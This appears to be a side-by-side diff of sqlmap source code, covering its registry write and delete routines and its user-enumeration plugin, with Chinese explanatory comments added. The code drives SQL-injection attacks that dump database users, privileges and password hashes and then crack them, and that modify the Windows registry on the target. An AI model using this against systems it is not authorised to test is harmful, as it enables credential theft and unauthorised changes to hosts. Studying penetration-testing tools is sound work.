if not regVal: if not regVal:
raise SqlmapMissingMandatoryOptionException(errMsg) raise SqlmapMissingMandatoryOptionException(errMsg) # 如果没有输入,则抛出缺少必要选项异常
else: else:
regVal = conf.regVal regVal = conf.regVal # 如果配置中指定了注册表值,则使用配置
if not conf.regData: if not conf.regData:
msg = "which registry key value data do you want to write? " msg = "which registry key value data do you want to write? "
regData = readInput(msg) regData = readInput(msg) # 读取用户输入的注册表数据
if not regData: if not regData:
raise SqlmapMissingMandatoryOptionException(errMsg) raise SqlmapMissingMandatoryOptionException(errMsg) # 如果没有输入,则抛出缺少必要选项异常
else: else:
regData = conf.regData regData = conf.regData # 如果配置中指定了注册表数据,则使用配置
if not conf.regType: if not conf.regType:
default = "REG_SZ" default = "REG_SZ"
msg = "which registry key value data-type is it? " msg = "which registry key value data-type is it? "
msg += "[%s] " % default msg += "[%s] " % default
regType = readInput(msg, default=default) regType = readInput(msg, default=default) # 读取用户输入的注册表类型默认使用REG_SZ
else: else:
regType = conf.regType regType = conf.regType # 如果配置中指定了注册表类型,则使用配置
infoMsg = "adding Windows registry path '%s\\%s' " % (regKey, regVal) infoMsg = "adding Windows registry path '%s\\%s' " % (regKey, regVal)
infoMsg += "with data '%s'. " % regData infoMsg += "with data '%s'. " % regData
infoMsg += "This will work only if the user running the database " infoMsg += "This will work only if the user running the database "
infoMsg += "process has privileges to modify the Windows registry." infoMsg += "process has privileges to modify the Windows registry."
logger.info(infoMsg) logger.info(infoMsg) # 打印添加注册表信息
self.addRegKey(regKey, regVal, regType, regData) self.addRegKey(regKey, regVal, regType, regData) # 添加注册表键值
def regDel(self): def regDel(self):
self._regInit() """
Deletes a value from the Windows registry.
删除Windows注册表中的值
"""
self._regInit() # 初始化注册表操作
errMsg = "missing mandatory option" errMsg = "missing mandatory option" # 缺少必要参数的错误信息
if not conf.regKey: if not conf.regKey:
msg = "which registry key do you want to delete? " msg = "which registry key do you want to delete? "
regKey = readInput(msg) regKey = readInput(msg) # 读取用户输入的注册表键
if not regKey: if not regKey:
raise SqlmapMissingMandatoryOptionException(errMsg) raise SqlmapMissingMandatoryOptionException(errMsg) # 如果没有输入,则抛出缺少必要选项异常
else: else:
regKey = conf.regKey regKey = conf.regKey # 如果配置中指定了注册表键,则使用配置
if not conf.regVal: if not conf.regVal:
msg = "which registry key value do you want to delete? " msg = "which registry key value do you want to delete? "
regVal = readInput(msg) regVal = readInput(msg) # 读取用户输入的注册表值
if not regVal: if not regVal:
raise SqlmapMissingMandatoryOptionException(errMsg) raise SqlmapMissingMandatoryOptionException(errMsg) # 如果没有输入,则抛出缺少必要选项异常
else: else:
regVal = conf.regVal regVal = conf.regVal # 如果配置中指定了注册表值,则使用配置
message = "are you sure that you want to delete the Windows " message = "are you sure that you want to delete the Windows "
message += "registry path '%s\\%s? [y/N] " % (regKey, regVal) message += "registry path '%s\\%s? [y/N] " % (regKey, regVal)
if not readInput(message, default='N', boolean=True): if not readInput(message, default='N', boolean=True):
return return # 如果用户选择不删除,则返回
infoMsg = "deleting Windows registry path '%s\\%s'. " % (regKey, regVal) infoMsg = "deleting Windows registry path '%s\\%s'. " % (regKey, regVal)
infoMsg += "This will work only if the user running the database " infoMsg += "This will work only if the user running the database "
infoMsg += "process has privileges to modify the Windows registry." infoMsg += "process has privileges to modify the Windows registry."
logger.info(infoMsg) logger.info(infoMsg) # 打印删除注册表信息
self.delRegKey(regKey, regVal) self.delRegKey(regKey, regVal) # 删除注册表键值

265
src/sqlmap-master/plugins/generic/users.py
Unescape View File

@ -52,69 +52,100 @@ from thirdparty.six.moves import zip as _zip
class Users(object): class Users(object):
""" """
This class defines users' enumeration functionalities for plugins. This class defines users' enumeration functionalities for plugins.
这个类定义了插件的用户枚举功能
""" """
def __init__(self): def __init__(self):
kb.data.currentUser = "" # 初始化用户相关的数据存储
kb.data.isDba = None kb.data.currentUser = "" # 当前用户
kb.data.cachedUsers = [] kb.data.isDba = None # 是否是DBA
kb.data.cachedUsersPasswords = {} kb.data.cachedUsers = [] # 缓存的用户列表
kb.data.cachedUsersPrivileges = {} kb.data.cachedUsersPasswords = {} # 缓存的用户密码哈希
kb.data.cachedUsersRoles = {} kb.data.cachedUsersPrivileges = {} # 缓存的用户权限
kb.data.cachedUsersRoles = {} # 缓存的用户角色
def getCurrentUser(self): def getCurrentUser(self):
"""
Retrieves the current database user.
获取当前数据库用户
"""
infoMsg = "fetching current user" infoMsg = "fetching current user"
logger.info(infoMsg) logger.info(infoMsg)
# 获取当前用户的SQL查询语句
query = queries[Backend.getIdentifiedDbms()].current_user.query query = queries[Backend.getIdentifiedDbms()].current_user.query
# 如果当前用户没有被获取过,则进行获取
if not kb.data.currentUser: if not kb.data.currentUser:
kb.data.currentUser = unArrayizeValue(inject.getValue(query)) kb.data.currentUser = unArrayizeValue(inject.getValue(query))
return kb.data.currentUser return kb.data.currentUser
def isDba(self, user=None): def isDba(self, user=None):
"""
Tests if the current or specified user is a DBA.
测试当前或指定用户是否是DBA数据库管理员
Args:
user (str, optional): 要测试的用户默认为None表示测试当前用户
Returns:
bool: 是否是DBA
"""
infoMsg = "testing if current user is DBA" infoMsg = "testing if current user is DBA"
logger.info(infoMsg) logger.info(infoMsg)
query = None query = None
# 根据不同的数据库类型构造不同的SQL查询语句
if Backend.isDbms(DBMS.MYSQL): if Backend.isDbms(DBMS.MYSQL):
self.getCurrentUser() self.getCurrentUser() # 先获取当前用户
if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE): if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE):
kb.data.isDba = "root" in (kb.data.currentUser or "") kb.data.isDba = "root" in (kb.data.currentUser or "") # Drizzle数据库通过用户名判断是否为root用户
elif kb.data.currentUser: elif kb.data.currentUser:
query = queries[Backend.getIdentifiedDbms()].is_dba.query % kb.data.currentUser.split("@")[0] query = queries[Backend.getIdentifiedDbms()].is_dba.query % kb.data.currentUser.split("@")[0] # 构建查询语句判断是否为MySQL的DBA
elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and user is not None: elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and user is not None:
query = queries[Backend.getIdentifiedDbms()].is_dba.query2 % user query = queries[Backend.getIdentifiedDbms()].is_dba.query2 % user # 构建查询语句判断是否为SQL Server或Sybase的DBA
else: else:
query = queries[Backend.getIdentifiedDbms()].is_dba.query query = queries[Backend.getIdentifiedDbms()].is_dba.query # 构建查询语句判断是否为其他数据库的DBA
# 执行查询
if query: if query:
query = agent.forgeCaseStatement(query) query = agent.forgeCaseStatement(query) # 注入时构造Case语句
kb.data.isDba = inject.checkBooleanExpression(query) or False kb.data.isDba = inject.checkBooleanExpression(query) or False # 执行查询并判断是否为DBA
return kb.data.isDba return kb.data.isDba
def getUsers(self): def getUsers(self):
"""
Retrieves database users.
获取数据库用户
Returns:
list: 用户列表
"""
infoMsg = "fetching database users" infoMsg = "fetching database users"
logger.info(infoMsg) logger.info(infoMsg)
# 获取查询用户表的SQL查询语句
rootQuery = queries[Backend.getIdentifiedDbms()].users rootQuery = queries[Backend.getIdentifiedDbms()].users
# 判断是否需要使用不同的查询语句
condition = (Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008"))) condition = (Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")))
condition |= (Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema) condition |= (Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema)
# 优先使用union, error, query技术进行查询否则使用盲注技术
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE): if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE):
query = rootQuery.inband.query3 query = rootQuery.inband.query3 # Drizzle数据库的查询语句
elif condition: elif condition:
query = rootQuery.inband.query2 query = rootQuery.inband.query2 # 条件判断下的查询语句
else: else:
query = rootQuery.inband.query query = rootQuery.inband.query # 通用查询语句
values = inject.getValue(query, blind=False, time=False) values = inject.getValue(query, blind=False, time=False) # 执行查询语句,获取用户列表
# 处理返回的用户列表
if not isNoneValue(values): if not isNoneValue(values):
kb.data.cachedUsers = [] kb.data.cachedUsers = []
for value in arrayizeValue(values): for value in arrayizeValue(values):
@ -122,18 +153,19 @@ class Users(object):
if not isNoneValue(value): if not isNoneValue(value):
kb.data.cachedUsers.append(value) kb.data.cachedUsers.append(value)
# 如果没有使用union, error, query技术获取到用户则使用盲注技术进行获取
if not kb.data.cachedUsers and isInferenceAvailable() and not conf.direct: if not kb.data.cachedUsers and isInferenceAvailable() and not conf.direct:
infoMsg = "fetching number of database users" infoMsg = "fetching number of database users"
logger.info(infoMsg) logger.info(infoMsg)
if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE): if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE):
query = rootQuery.blind.count3 query = rootQuery.blind.count3 # Drizzle数据库的查询语句
elif condition: elif condition:
query = rootQuery.blind.count2 query = rootQuery.blind.count2 # 条件判断下的查询语句
else: else:
query = rootQuery.blind.count query = rootQuery.blind.count # 通用查询语句
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) # 获取用户数量
if count == 0: if count == 0:
return kb.data.cachedUsers return kb.data.cachedUsers
@ -142,8 +174,9 @@ class Users(object):
raise SqlmapNoneDataException(errMsg) raise SqlmapNoneDataException(errMsg)
plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES
indexRange = getLimitRange(count, plusOne=plusOne) indexRange = getLimitRange(count, plusOne=plusOne) # 计算盲注的查询范围
# 循环盲注查询用户
for index in indexRange: for index in indexRange:
if Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MAXDB): if Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MAXDB):
query = rootQuery.blind.query % (kb.data.cachedUsers[-1] if kb.data.cachedUsers else " ") query = rootQuery.blind.query % (kb.data.cachedUsers[-1] if kb.data.cachedUsers else " ")
@ -166,8 +199,16 @@ class Users(object):
return kb.data.cachedUsers return kb.data.cachedUsers
def getPasswordHashes(self): def getPasswordHashes(self):
"""
Retrieves password hashes of database users.
获取数据库用户的密码哈希值
Returns:
dict: 用户名和密码哈希的字典
"""
infoMsg = "fetching database users password hashes" infoMsg = "fetching database users password hashes"
# 获取查询密码哈希的SQL查询语句
rootQuery = queries[Backend.getIdentifiedDbms()].passwords rootQuery = queries[Backend.getIdentifiedDbms()].passwords
if conf.user == CURRENT_USER: if conf.user == CURRENT_USER:
@ -177,7 +218,7 @@ class Users(object):
logger.info(infoMsg) logger.info(infoMsg)
if conf.user and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): if conf.user and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
conf.user = conf.user.upper() conf.user = conf.user.upper() # Oracle和DB2数据库的用户名为大写
if conf.user: if conf.user:
users = conf.user.split(',') users = conf.user.split(',')
@ -187,28 +228,31 @@ class Users(object):
parsedUser = re.search(r"['\"]?(.*?)['\"]?\@", user) parsedUser = re.search(r"['\"]?(.*?)['\"]?\@", user)
if parsedUser: if parsedUser:
users[users.index(user)] = parsedUser.groups()[0] users[users.index(user)] = parsedUser.groups()[0] # 处理MySQL的用户名格式去掉引号和@后面的部分
else: else:
users = [] users = []
users = [_ for _ in users if _] users = [_ for _ in users if _]
# 优先使用union, error, query技术进行查询否则使用盲注技术
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")): if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")):
query = rootQuery.inband.query2 query = rootQuery.inband.query2 # SQL Server 2005和2008的查询语句
else: else:
query = rootQuery.inband.query query = rootQuery.inband.query # 通用查询语句
condition = rootQuery.inband.condition condition = rootQuery.inband.condition # 查询条件
# 如果指定了用户,则加入查询条件
if conf.user: if conf.user:
query += " WHERE " query += " WHERE "
query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users)) query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users))
# 处理Sybase数据库的特殊情况
if Backend.isDbms(DBMS.SYBASE): if Backend.isDbms(DBMS.SYBASE):
getCurrentThreadData().disableStdOut = True getCurrentThreadData().disableStdOut = True
retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName, '%s.password' % kb.aliasName], blind=False) retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName, '%s.password' % kb.aliasName], blind=False) # 使用pivotDumpTable函数获取用户名和密码哈希
if retVal: if retVal:
for user, password in filterPairValues(_zip(retVal[0]["%s.name" % kb.aliasName], retVal[0]["%s.password" % kb.aliasName])): for user, password in filterPairValues(_zip(retVal[0]["%s.name" % kb.aliasName], retVal[0]["%s.password" % kb.aliasName])):
@ -219,13 +263,14 @@ class Users(object):
getCurrentThreadData().disableStdOut = False getCurrentThreadData().disableStdOut = False
else: else:
values = inject.getValue(query, blind=False, time=False) values = inject.getValue(query, blind=False, time=False) # 执行查询,获取用户名和密码哈希
if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values): if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values):
values = inject.getValue(query.replace("master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr"), blind=False, time=False) values = inject.getValue(query.replace("master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr"), blind=False, time=False) # SQL Server的特殊情况替换函数
elif Backend.isDbms(DBMS.MYSQL) and (isNoneValue(values) or all(len(value) == 2 and (isNullValue(value[1]) or isNoneValue(value[1])) for value in values)): elif Backend.isDbms(DBMS.MYSQL) and (isNoneValue(values) or all(len(value) == 2 and (isNullValue(value[1]) or isNoneValue(value[1])) for value in values)):
values = inject.getValue(query.replace("authentication_string", "password"), blind=False, time=False) values = inject.getValue(query.replace("authentication_string", "password"), blind=False, time=False) # MySQL的特殊情况替换字段
# 处理返回的用户名和密码哈希
for user, password in filterPairValues(values): for user, password in filterPairValues(values):
if not user or user == " ": if not user or user == " ":
continue continue
@ -237,19 +282,21 @@ class Users(object):
else: else:
kb.data.cachedUsersPasswords[user].append(password) kb.data.cachedUsersPasswords[user].append(password)
# 如果没有使用union, error, query技术获取到密码哈希则使用盲注技术进行获取
if not kb.data.cachedUsersPasswords and isInferenceAvailable() and not conf.direct: if not kb.data.cachedUsersPasswords and isInferenceAvailable() and not conf.direct:
fallback = False fallback = False
if not len(users): if not len(users):
users = self.getUsers() users = self.getUsers() # 先获取用户列表
if Backend.isDbms(DBMS.MYSQL): if Backend.isDbms(DBMS.MYSQL):
for user in users: for user in users:
parsedUser = re.search(r"['\"]?(.*?)['\"]?\@", user) parsedUser = re.search(r"['\"]?(.*?)['\"]?\@", user)
if parsedUser: if parsedUser:
users[users.index(user)] = parsedUser.groups()[0] users[users.index(user)] = parsedUser.groups()[0] # 处理MySQL的用户名格式去掉引号和@后面的部分
# 处理Sybase数据库的特殊情况
if Backend.isDbms(DBMS.SYBASE): if Backend.isDbms(DBMS.SYBASE):
getCurrentThreadData().disableStdOut = True getCurrentThreadData().disableStdOut = True
@ -268,8 +315,9 @@ class Users(object):
getCurrentThreadData().disableStdOut = False getCurrentThreadData().disableStdOut = False
else: else:
retrievedUsers = set() retrievedUsers = set() # 已获取密码哈希的用户
# 循环盲注查询密码哈希
for user in users: for user in users:
user = unArrayizeValue(user) user = unArrayizeValue(user)
@ -277,26 +325,26 @@ class Users(object):
continue continue
if Backend.getIdentifiedDbms() in (DBMS.INFORMIX, DBMS.VIRTUOSO): if Backend.getIdentifiedDbms() in (DBMS.INFORMIX, DBMS.VIRTUOSO):
count = 1 count = 1 # Informix和Virtuoso数据库的特殊情况直接查询密码哈希
else: else:
infoMsg = "fetching number of password hashes " infoMsg = "fetching number of password hashes "
infoMsg += "for user '%s'" % user infoMsg += "for user '%s'" % user
logger.info(infoMsg) logger.info(infoMsg)
if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")): if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")):
query = rootQuery.blind.count2 % user query = rootQuery.blind.count2 % user # SQL Server 2005和2008的查询语句
else: else:
query = rootQuery.blind.count % user query = rootQuery.blind.count % user # 通用查询语句
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) # 获取密码哈希数量
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
if Backend.isDbms(DBMS.MSSQL): if Backend.isDbms(DBMS.MSSQL):
fallback = True fallback = True
count = inject.getValue(query.replace("master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr"), union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query.replace("master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr"), union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) # SQL Server的特殊情况替换函数
elif Backend.isDbms(DBMS.MYSQL): elif Backend.isDbms(DBMS.MYSQL):
fallback = True fallback = True
count = inject.getValue(query.replace("authentication_string", "password"), union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query.replace("authentication_string", "password"), union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) # MySQL的特殊情况替换字段
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
warnMsg = "unable to retrieve the number of password " warnMsg = "unable to retrieve the number of password "
@ -310,33 +358,34 @@ class Users(object):
passwords = [] passwords = []
plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES
indexRange = getLimitRange(count, plusOne=plusOne) indexRange = getLimitRange(count, plusOne=plusOne) # 计算盲注的查询范围
# 循环盲注查询密码哈希
for index in indexRange: for index in indexRange:
if Backend.isDbms(DBMS.MSSQL): if Backend.isDbms(DBMS.MSSQL):
if Backend.isVersionWithin(("2005", "2008")): if Backend.isVersionWithin(("2005", "2008")):
query = rootQuery.blind.query2 % (user, index, user) query = rootQuery.blind.query2 % (user, index, user) # SQL Server 2005和2008的查询语句
else: else:
query = rootQuery.blind.query % (user, index, user) query = rootQuery.blind.query % (user, index, user) # 通用查询语句
if fallback: if fallback:
query = query.replace("master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr") query = query.replace("master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr") # SQL Server的特殊情况替换函数
elif Backend.getIdentifiedDbms() in (DBMS.INFORMIX, DBMS.VIRTUOSO): elif Backend.getIdentifiedDbms() in (DBMS.INFORMIX, DBMS.VIRTUOSO):
query = rootQuery.blind.query % (user,) query = rootQuery.blind.query % (user,) # Informix和Virtuoso数据库的特殊情况
elif Backend.isDbms(DBMS.HSQLDB): elif Backend.isDbms(DBMS.HSQLDB):
query = rootQuery.blind.query % (index, user) query = rootQuery.blind.query % (index, user) # HSQLDB数据库的特殊情况
else: else:
query = rootQuery.blind.query % (user, index) query = rootQuery.blind.query % (user, index) # 通用查询语句
if Backend.isDbms(DBMS.MYSQL): if Backend.isDbms(DBMS.MYSQL):
if fallback: if fallback:
query = query.replace("authentication_string", "password") query = query.replace("authentication_string", "password") # MySQL的特殊情况替换字段
password = unArrayizeValue(inject.getValue(query, union=False, error=False)) password = unArrayizeValue(inject.getValue(query, union=False, error=False))
password = parsePasswordHash(password) password = parsePasswordHash(password) # 解析密码哈希
passwords.append(password) passwords.append(password)
@ -355,26 +404,37 @@ class Users(object):
logger.error(errMsg) logger.error(errMsg)
else: else:
for user in kb.data.cachedUsersPasswords: for user in kb.data.cachedUsersPasswords:
kb.data.cachedUsersPasswords[user] = list(set(kb.data.cachedUsersPasswords[user])) kb.data.cachedUsersPasswords[user] = list(set(kb.data.cachedUsersPasswords[user])) # 去重密码哈希
storeHashesToFile(kb.data.cachedUsersPasswords) storeHashesToFile(kb.data.cachedUsersPasswords) # 保存密码哈希到文件
message = "do you want to perform a dictionary-based attack " message = "do you want to perform a dictionary-based attack "
message += "against retrieved password hashes? [Y/n/q]" message += "against retrieved password hashes? [Y/n/q]"
choice = readInput(message, default='Y').upper() choice = readInput(message, default='Y').upper() # 提示是否进行字典攻击
if choice == 'N': if choice == 'N':
pass pass
elif choice == 'Q': elif choice == 'Q':
raise SqlmapUserQuitException raise SqlmapUserQuitException
else: else:
attackCachedUsersPasswords() attackCachedUsersPasswords() # 进行字典攻击
return kb.data.cachedUsersPasswords return kb.data.cachedUsersPasswords
def getPrivileges(self, query2=False): def getPrivileges(self, query2=False):
"""
Retrieves privileges of database users.
获取数据库用户的权限
Args:
query2 (bool, optional): 是否使用第二种查询方式默认为False
Returns:
tuple: 用户名和权限的字典以及DBA用户的集合
"""
infoMsg = "fetching database users privileges" infoMsg = "fetching database users privileges"
# 获取查询权限的SQL查询语句
rootQuery = queries[Backend.getIdentifiedDbms()].privileges rootQuery = queries[Backend.getIdentifiedDbms()].privileges
if conf.user == CURRENT_USER: if conf.user == CURRENT_USER:
@ -401,36 +461,38 @@ class Users(object):
users = [_ for _ in users if _] users = [_ for _ in users if _]
# Set containing the list of DBMS administrators # Set containing the list of DBMS administrators
areAdmins = set() areAdmins = set() # 存储DBA用户的集合
if not kb.data.cachedUsersPrivileges and any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if not kb.data.cachedUsersPrivileges and any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
query = rootQuery.inband.query2 query = rootQuery.inband.query2 # MySQL 5.0以下版本的查询语句
condition = rootQuery.inband.condition2 condition = rootQuery.inband.condition2 # MySQL 5.0以下版本的查询条件
elif Backend.isDbms(DBMS.ORACLE) and query2: elif Backend.isDbms(DBMS.ORACLE) and query2:
query = rootQuery.inband.query2 query = rootQuery.inband.query2 # Oracle的第二种查询方式
condition = rootQuery.inband.condition2 condition = rootQuery.inband.condition2 # Oracle的第二种查询条件
else: else:
query = rootQuery.inband.query query = rootQuery.inband.query # 通用查询语句
condition = rootQuery.inband.condition condition = rootQuery.inband.condition # 通用查询条件
# 如果指定了用户,则加入查询条件
if conf.user: if conf.user:
query += " WHERE " query += " WHERE "
if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema: if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:
query += " OR ".join("%s LIKE '%%%s%%'" % (condition, user) for user in sorted(users)) query += " OR ".join("%s LIKE '%%%s%%'" % (condition, user) for user in sorted(users)) # MySQL 5.0以上版本的查询条件
else: else:
query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users)) query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users)) # 通用查询条件
values = inject.getValue(query, blind=False, time=False) values = inject.getValue(query, blind=False, time=False) # 执行查询语句,获取权限信息
if not values and Backend.isDbms(DBMS.ORACLE) and not query2: if not values and Backend.isDbms(DBMS.ORACLE) and not query2:
infoMsg = "trying with table 'USER_SYS_PRIVS'" infoMsg = "trying with table 'USER_SYS_PRIVS'"
logger.info(infoMsg) logger.info(infoMsg)
return self.getPrivileges(query2=True) return self.getPrivileges(query2=True) # 如果没有获取到权限信息,尝试使用第二种查询方式
if not isNoneValue(values): if not isNoneValue(values):
# 处理返回的权限信息
for value in values: for value in values:
user = None user = None
privileges = set() privileges = set()
@ -438,7 +500,7 @@ class Users(object):
for count in xrange(0, len(value or [])): for count in xrange(0, len(value or [])):
# The first column is always the username # The first column is always the username
if count == 0: if count == 0:
user = value[count] user = value[count] # 获取用户名
# The other columns are the privileges # The other columns are the privileges
else: else:
@ -451,23 +513,23 @@ class Users(object):
# True, 0 otherwise # True, 0 otherwise
if Backend.isDbms(DBMS.PGSQL) and getUnicode(privilege).isdigit(): if Backend.isDbms(DBMS.PGSQL) and getUnicode(privilege).isdigit():
if int(privilege) == 1 and count in PGSQL_PRIVS: if int(privilege) == 1 and count in PGSQL_PRIVS:
privileges.add(PGSQL_PRIVS[count]) privileges.add(PGSQL_PRIVS[count]) # PostgreSQL的权限处理
# In MySQL >= 5.0 and Oracle we get the list # In MySQL >= 5.0 and Oracle we get the list
# of privileges as string # of privileges as string
elif Backend.isDbms(DBMS.ORACLE) or (Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema) or Backend.getIdentifiedDbms() in (DBMS.VERTICA, DBMS.MIMERSQL, DBMS.CUBRID): elif Backend.isDbms(DBMS.ORACLE) or (Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema) or Backend.getIdentifiedDbms() in (DBMS.VERTICA, DBMS.MIMERSQL, DBMS.CUBRID):
privileges.add(privilege) privileges.add(privilege) # MySQL 5.0以上版本和Oracle的权限处理
# In MySQL < 5.0 we get Y if the privilege is # In MySQL < 5.0 we get Y if the privilege is
# True, N otherwise # True, N otherwise
elif Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: elif Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
if privilege.upper() == 'Y': if privilege.upper() == 'Y':
privileges.add(MYSQL_PRIVS[count]) privileges.add(MYSQL_PRIVS[count]) # MySQL 5.0以下版本的权限处理
# In Firebird we get one letter for each privilege # In Firebird we get one letter for each privilege
elif Backend.isDbms(DBMS.FIREBIRD): elif Backend.isDbms(DBMS.FIREBIRD):
if privilege.strip() in FIREBIRD_PRIVS: if privilege.strip() in FIREBIRD_PRIVS:
privileges.add(FIREBIRD_PRIVS[privilege.strip()]) privileges.add(FIREBIRD_PRIVS[privilege.strip()]) # Firebird的权限处理
# In DB2 we get Y or G if the privilege is # In DB2 we get Y or G if the privilege is
# True, N otherwise # True, N otherwise
@ -487,21 +549,21 @@ class Users(object):
i += 1 i += 1
privileges.add(privilege) privileges.add(privilege) # DB2的权限处理
if user in kb.data.cachedUsersPrivileges: if user in kb.data.cachedUsersPrivileges:
kb.data.cachedUsersPrivileges[user] = list(privileges.union(kb.data.cachedUsersPrivileges[user])) kb.data.cachedUsersPrivileges[user] = list(privileges.union(kb.data.cachedUsersPrivileges[user])) # 合并权限
else: else:
kb.data.cachedUsersPrivileges[user] = list(privileges) kb.data.cachedUsersPrivileges[user] = list(privileges)
if not kb.data.cachedUsersPrivileges and isInferenceAvailable() and not conf.direct: if not kb.data.cachedUsersPrivileges and isInferenceAvailable() and not conf.direct:
if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema: if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:
conditionChar = "LIKE" conditionChar = "LIKE" # MySQL 5.0以上版本的模糊查询
else: else:
conditionChar = "=" conditionChar = "=" # 通用查询
if not len(users): if not len(users):
users = self.getUsers() users = self.getUsers() # 获取用户列表
if Backend.isDbms(DBMS.MYSQL): if Backend.isDbms(DBMS.MYSQL):
for user in users: for user in users:
@ -510,33 +572,34 @@ class Users(object):
if parsedUser: if parsedUser:
users[users.index(user)] = parsedUser.groups()[0] users[users.index(user)] = parsedUser.groups()[0]
retrievedUsers = set() retrievedUsers = set() # 已获取权限的用户
# 循环盲注查询权限
for user in users: for user in users:
outuser = user outuser = user
if user in retrievedUsers: if user in retrievedUsers:
continue continue
if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema: if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:
user = "%%%s%%" % user user = "%%%s%%" % user # MySQL 5.0以上版本的模糊查询
if Backend.isDbms(DBMS.INFORMIX): if Backend.isDbms(DBMS.INFORMIX):
count = 1 count = 1 # Informix数据库的特殊情况直接查询权限
else: else:
infoMsg = "fetching number of privileges " infoMsg = "fetching number of privileges "
infoMsg += "for user '%s'" % outuser infoMsg += "for user '%s'" % outuser
logger.info(infoMsg) logger.info(infoMsg)
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
query = rootQuery.blind.count2 % user query = rootQuery.blind.count2 % user # MySQL 5.0以下版本的查询语句
elif Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema: elif Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:
